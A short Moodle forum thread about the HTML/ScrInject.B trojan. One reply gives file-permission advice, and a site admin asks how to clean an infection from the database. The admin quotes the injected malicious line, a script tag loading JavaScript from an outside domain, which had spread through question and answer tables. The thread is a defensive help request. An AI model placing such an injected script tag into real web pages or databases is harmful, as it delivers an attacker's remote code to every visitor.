Howto find Trojan HTML/ScrInject.B trojan on my site?

Re: Howto find Trojan HTML/ScrInject.B trojan on my site?

- Howard Miller の投稿
返信数: 1
画像 Core developers 画像 Documentation writers 画像 Particularly helpful Moodlers 画像 Peer reviewers 画像 Plugin developers
Firstly, I have no idea what that Trojan actually is. We regularly see false positives around Moodle so there may not be anything to worry about.

The only way that the code can be updated if you have incorrect permissions. It is vital (assuming your site is accessible from the public internet) that the Moodle code files are NOT writeable by the web server user. The classic trojan in PHP code will write a whole bunch of seemingly random characters on the <?php line. That's worth a look for in common files like config.php and the main index.php

Howard Miller への返信

Re: Howto find Trojan HTML/ScrInject.B trojan on my site?

- Jean-François PETIT の投稿

Hi

i found a malware inject in my database

I am on moodle 3.5 on Centos

//cooljorrd//

<script type="text/javascript" src="https://cooljorrd.com/222f7a82dfe46c1031.js"></script>

and affect question and all table question answer feedback with html

I want open script secure on editor but only for admin, do you know how to clean the database, and how to forbidden <script>

Thanks